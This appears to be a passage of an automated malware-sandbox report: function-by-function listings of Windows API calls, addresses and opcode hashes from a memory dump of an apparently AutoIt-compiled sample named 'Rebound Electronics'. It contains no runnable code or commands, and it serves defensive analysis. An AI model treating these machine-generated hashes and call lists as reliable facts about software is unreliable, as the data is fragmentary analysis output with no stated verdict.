Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: cb84b0d3fb201876eabbf4f38a01940eebce96b9303924c951ba56c0f84266b9
Instruction ID: d399391a7f9c5e6374fb1a8adecf9b01861314bcab8be869bdde0fd68a5ee6ad
Opcode Fuzzy Hash: cb84b0d3fb201876eabbf4f38a01940eebce96b9303924c951ba56c0f84266b9
Instruction Fuzzy Hash: 03112B72A04284BFC7119F6CDC8AF9E7BAD9B45318F144325F922E3361D7709E009BA0

Function 00C3D17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C3D1BA
GetStockObject.GDI32(00000011), ref: 00C3D1CE
SendMessageW.USER32(00000000,00000030,00000000), ref: 00C3D1D8

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 54ca8c962c7e7aa525283d1594414d46cc28eade47aff16721bdcb29c4925cc1
Instruction ID: 8996f9b68d1973d578b9ea18c891d66e58e9975b185189f46e51e3ceec5ce893
Opcode Fuzzy Hash: 54ca8c962c7e7aa525283d1594414d46cc28eade47aff16721bdcb29c4925cc1
Instruction Fuzzy Hash: 0D118B72501509BFEF124F90AC54FEEBB69FF09368F040105FA1692050C7319D60ABA0

Function 00C54DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00C54E16

Part of subcall function 00C554F5: __fltout2.LIBCMT ref: 00C5551E

__cftog_l.LIBCMT ref: 00C54E3C
__cftoe_l.LIBCMT ref: 00C54E6E

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction ID: 04b2d05bab3ca16dd3267270f0227ef3b5421c1c2007fa01f150bf954c927848
Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction Fuzzy Hash: 9A017E3A00014ABBCF165E84DC128EE7F22BB18356B488415FE2859031D376CAF5AB89

Function 00C47452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00C47A0D: __getptd_noexit.LIBCMT ref: 00C47A0E

__lock.LIBCMT ref: 00C4748F
InterlockedDecrement.KERNEL32(?), ref: 00C474AC
_free.LIBCMT ref: 00C474BF
InterlockedIncrement.KERNEL32(018AAC30), ref: 00C474D7

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
String ID:
API String ID: 2704283638-0
Opcode ID: f37216200402666ec736aace3d57a15ff50e97e99bf6fbe008b0da18dec8a11e
Instruction ID: e44947d9153c8b9fe6565f976e1c1e001ce48287dab14e953771838c308bef46
Opcode Fuzzy Hash: f37216200402666ec736aace3d57a15ff50e97e99bf6fbe008b0da18dec8a11e
Instruction Fuzzy Hash: 6301F53690A621EBCB12AF64980977DBB70BF05B20F155206F82573690CB349E41EFC6

Function 00C47A94 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00C47AD8

Part of subcall function 00C47CF4: __mtinitlocknum.LIBCMT ref: 00C47D06
Part of subcall function 00C47CF4: EnterCriticalSection.KERNEL32(00000000,?,00C47ADD,0000000D), ref: 00C47D1F

InterlockedIncrement.KERNEL32(?), ref: 00C47AE5
__lock.LIBCMT ref: 00C47AF9
___addlocaleref.LIBCMT ref: 00C47B17

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
String ID:
API String ID: 1687444384-0
Opcode ID: 583a4e39012eefab03e64724b38b2a1cb30ddaeb96b00029d8ea8ea87f6b4c0b
Instruction ID: 8fe3aa0cd903cd6b39f0bfc89ec660e1f802ced0c0a1f85a2ceec4e0bfbf69b0
Opcode Fuzzy Hash: 583a4e39012eefab03e64724b38b2a1cb30ddaeb96b00029d8ea8ea87f6b4c0b
Instruction Fuzzy Hash: 6A016971405B00EFDB20DF75D90674ABBF0FF40325F208A0EA49A976A0CBB0A680DB46

Function 00C8E32E Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C8E33D
_memset.LIBCMT ref: 00C8E34C
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00CE3D00,00CE3D44), ref: 00C8E37B
CloseHandle.KERNEL32 ref: 00C8E38D

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: c88d0fcd895db97bbc1741338f05aa85d0760c61ede3a2b86e0ec5d7c5620f16
Instruction ID: 0df3a79a808187b1b3a5092cd9544669f1e2b5b323ed10cde80220b634f23729
Opcode Fuzzy Hash: c88d0fcd895db97bbc1741338f05aa85d0760c61ede3a2b86e0ec5d7c5620f16
Instruction Fuzzy Hash: F4F05EF15603C4BAE7102B61AC89F7B7E6DEB05754F004421BF09DB1A2D375AF1096A8

Function 00C8EA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00C3AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00C3AFE3
Part of subcall function 00C3AF83: SelectObject.GDI32(?,00000000), ref: 00C3AFF2
Part of subcall function 00C3AF83: BeginPath.GDI32(?), ref: 00C3B009
Part of subcall function 00C3AF83: SelectObject.GDI32(?,00000000), ref: 00C3B033

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00C8EA8E
LineTo.GDI32(00000000,?,?), ref: 00C8EA9B
EndPath.GDI32(00000000), ref: 00C8EAAB
StrokePath.GDI32(00000000), ref: 00C8EAB9

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 72809e8930504d2ba732b954b4520d9b0fb46f3d7ba9c166ee98c96acae16502
Instruction ID: 444b9ffbfe5d056bced601ad0bb4a64c6e6b318394af7acf3130bab9d9bf8873
Opcode Fuzzy Hash: 72809e8930504d2ba732b954b4520d9b0fb46f3d7ba9c166ee98c96acae16502
Instruction Fuzzy Hash: 21F08231005259BBDB12AF94AD0DFCE3F19AF0B715F084101FE13660E1C7745662DB99

Function 00C5C82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00C5C84A
GetWindowThreadProcessId.USER32(?,00000000), ref: 00C5C85D
GetCurrentThreadId.KERNEL32 ref: 00C5C864
AttachThreadInput.USER32(00000000), ref: 00C5C86B

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 6129d7729270addc8a34e736e20be6b9bb413db60245be70b3240c42d97e3452
Instruction ID: 4f08042110c08ccb6729c6c3976eb4b57bf3a08428fc76685a97baccd034725f
Opcode Fuzzy Hash: 6129d7729270addc8a34e736e20be6b9bb413db60245be70b3240c42d97e3452
Instruction Fuzzy Hash: 4DE03975141228BADB201BA2DC4DFDF7F5CEF067A6F008421BA1B868A1C6B18584CBE0

Function 00C5B0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00C5B0D6
OpenThreadToken.ADVAPI32(00000000,?,?,?,00C5AC9D), ref: 00C5B0DD
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00C5AC9D), ref: 00C5B0EA
OpenProcessToken.ADVAPI32(00000000,?,?,?,00C5AC9D), ref: 00C5B0F1

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: d47518da33c063d0dd85bf7f8c783439fd60f65ed9fa8cda6186c0145c8cb83c
Instruction ID: a469dd2057424eb74d253b67f993aa6347e7900c3e96ce1c3fad291bc43e5037
Opcode Fuzzy Hash: d47518da33c063d0dd85bf7f8c783439fd60f65ed9fa8cda6186c0145c8cb83c
Instruction Fuzzy Hash: 2AE086B6601211ABD7201FB19D0DB4F3BA8EF9679BF018818F643D7090DB348446C761

Function 00C3B47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00C3B496
SetTextColor.GDI32(?,000000FF), ref: 00C3B4A0
SetBkMode.GDI32(?,00000001), ref: 00C3B4B5
GetStockObject.GDI32(00000005), ref: 00C3B4BD
GetWindowDC.USER32(?,00000000), ref: 00C9DE2B
GetPixel.GDI32(00000000,00000000,00000000), ref: 00C9DE38
GetPixel.GDI32(00000000,?,00000000), ref: 00C9DE51
GetPixel.GDI32(00000000,00000000,?), ref: 00C9DE6A
GetPixel.GDI32(00000000,?,?), ref: 00C9DE8A
ReleaseDC.USER32(?,00000000), ref: 00C9DE95

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 4805a6970780fa49da113835f83576553dbdd45c2af15ce668950725be246058
Instruction ID: 578bd569cd5a4f567b0b87c6b3df282ca0ae288e6810bbe6b894fcca3aabb01c
Opcode Fuzzy Hash: 4805a6970780fa49da113835f83576553dbdd45c2af15ce668950725be246058
Instruction Fuzzy Hash: 14E0ED71500240AEDF215F64AC0DBDC3B11AB5233AF14C666F77B594E1C7714A81DB21

Function 00C5B2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C5B2DF
UnloadUserProfile.USERENV(?,?), ref: 00C5B2EB
CloseHandle.KERNEL32(?), ref: 00C5B2F4
CloseHandle.KERNEL32(?), ref: 00C5B2FC

Part of subcall function 00C5AB24: GetProcessHeap.KERNEL32(00000000,?,00C5A848), ref: 00C5AB2B
Part of subcall function 00C5AB24: HeapFree.KERNEL32(00000000), ref: 00C5AB32

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: b28cc0cfed27ee47f24c9744980d426d6ccaba685095f10a4c2f0514268e97af
Instruction ID: 1a0b60d24379db4f6747a6e1f2963281cd91dddb0928df8175d75050dff8089c
Opcode Fuzzy Hash: b28cc0cfed27ee47f24c9744980d426d6ccaba685095f10a4c2f0514268e97af
Instruction Fuzzy Hash: 07E0BF7A104405BBCB012B95DC08A5DFB76FF893253108221F61782975CB329871EB91

Function 00C9B29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00C9B29A
GetDC.USER32(00000000), ref: 00C9B2A4
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C9B2C3
ReleaseDC.USER32 ref: 00C9B2E2

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 358fe5f75d21535a7a0ab9c90afcd26403f59402bf34b1e4cf5b7634988e317a
Instruction ID: 35e12fc2539e44d3b9202462dd931ba87ec562443aca666ce48248f7335969e2
Opcode Fuzzy Hash: 358fe5f75d21535a7a0ab9c90afcd26403f59402bf34b1e4cf5b7634988e317a
Instruction Fuzzy Hash: E0E012B1500204EFEB005F70A848B6E7BA8EB4C358F12C80AF85B8B610CA7498409B40

Function 00C9B2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00C9B2AE
GetDC.USER32(00000000), ref: 00C9B2B8
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C9B2C3
ReleaseDC.USER32 ref: 00C9B2E2

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 17731100f03923e8df84f43f5ece1d826e6a637743f8c3c13a8bfd1418f2659c
Instruction ID: ea7424e3274c39d732adc185d5dc9ab51d0164d08317974f320643fa843d6a0f
Opcode Fuzzy Hash: 17731100f03923e8df84f43f5ece1d826e6a637743f8c3c13a8bfd1418f2659c
Instruction Fuzzy Hash: 01E046B1500300EFDF005F70D84876D7BA8EB4D358F12C809F95B8B610CB7898008F00

Function 00C5DCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 00C5DEAA

Strings

Container, xrefs: 00C5DE29
AutoIt3GUI, xrefs: 00C5DE22

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 8a9a35e71d6a61523a2592fe032d682bcb45dc67311b44578cf6a5519b35c07a
Instruction ID: fcc200396dd311d66ce8ae22fe2801fa71088ec1712cce3ec7ee524dc6addf6b
Opcode Fuzzy Hash: 8a9a35e71d6a61523a2592fe032d682bcb45dc67311b44578cf6a5519b35c07a
Instruction Fuzzy Hash: 7C9158746007019FDB24CF64C884B6AB7B5BF49711F10856EF91ACB291DB70E985CB64

Function 00C3BCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00C3BCDA
GlobalMemoryStatusEx.KERNEL32 ref: 00C3BCF3

Strings

@, xrefs: 00C3BCE8

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 19eb7d8ca36c3d1da734f651df511123c1dc6a71a5582f2de9cd29a559dbee82
Instruction ID: c55fb32152d9fc12e3749bbe3db50bb94a4b5199d8abe520ea64291ce1aa1a35
Opcode Fuzzy Hash: 19eb7d8ca36c3d1da734f651df511123c1dc6a71a5582f2de9cd29a559dbee82
Instruction Fuzzy Hash: 5A5133714187449BE720AF14EC86BAFBBE8FF94354F41484EF1C8420A6EB7089A9D752

Function 00C6C56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00C244ED: __fread_nolock.LIBCMT ref: 00C2450B

_wcscmp.LIBCMT ref: 00C6C65D
_wcscmp.LIBCMT ref: 00C6C670

Strings

FILE, xrefs: 00C6C5A5

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 7a3b88aeac69636fc90423e3068a57c38b922ff6987678090936e62c3b8fc178
Instruction ID: 80cdfc65e9b35b3d6ed15f73890c0ddf6803e8da3000aa0ff834e15c2d437080
Opcode Fuzzy Hash: 7a3b88aeac69636fc90423e3068a57c38b922ff6987678090936e62c3b8fc178
Instruction Fuzzy Hash: BB41D676A0021ABBDF20ABA4DC82FEF77B9EF49714F004079F655EB181D6709A04DB61

Function 00C8A76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00C8A85A
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C8A86F

Strings

', xrefs: 00C8A7C3

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 3498d36ca1eefcee1678c2f66780a1decd75d12fa7c3b228217ccfd4c739e3b4
Instruction ID: 56713efa63aa577ca43564695beac016c6a863d5adb477e385e881a742e91b4b
Opcode Fuzzy Hash: 3498d36ca1eefcee1678c2f66780a1decd75d12fa7c3b228217ccfd4c739e3b4
Instruction Fuzzy Hash: FB41F974E013099FEB14DF69D881BDA7BB9FB08304F14006AE915EB381D770A951DFA5

Function 00C75180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C75190
InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00C751C6

Strings

|, xrefs: 00C751B5

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 9a522cbc66636c1282fa5d5db9b74a8ba51a826b981ed55e907acded6ad2c0dd
Instruction ID: 3d53d522f14dd8d282ef730064437e434660550c583f314b7474fdb1c9d13432
Opcode Fuzzy Hash: 9a522cbc66636c1282fa5d5db9b74a8ba51a826b981ed55e907acded6ad2c0dd
